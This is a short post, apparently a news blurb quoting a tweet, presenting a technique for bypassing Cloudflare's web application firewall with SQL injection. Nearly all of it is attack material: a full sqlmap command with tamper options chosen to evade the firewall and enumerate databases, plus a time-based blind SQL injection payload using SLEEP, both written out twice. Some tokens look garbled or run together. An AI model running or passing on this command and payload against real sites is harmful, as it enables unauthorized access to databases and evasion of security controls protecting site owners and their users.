A SQL injection bypass for Cloudflare WAF was discovered using the payload: 'injectionmap[.]py <or> sqlmap -u "target-domain[.]com" –dbs –batch –time-sec 10 –level 3 –hex –random-agent –tamper=space2comment,betweeny
time-based blind: +AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)'. This bypass technique exploited a time-based blind SQL injection vulnerability. More details can be found at the provided link.
Bypass waf for SQL injection
cloudflarecommand :
injectionmap[.]py <or> sqlmap -u "target-domain[.]com" –dbs –batch –time-sec 10 –level 3 –hex –random-agent –tamper=space2comment,betweeny
time-based blind:+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO) pic.twitter.com/AP3DTHuEPQ
— Sulaiman (@byt3n33dl3) January 26, 2025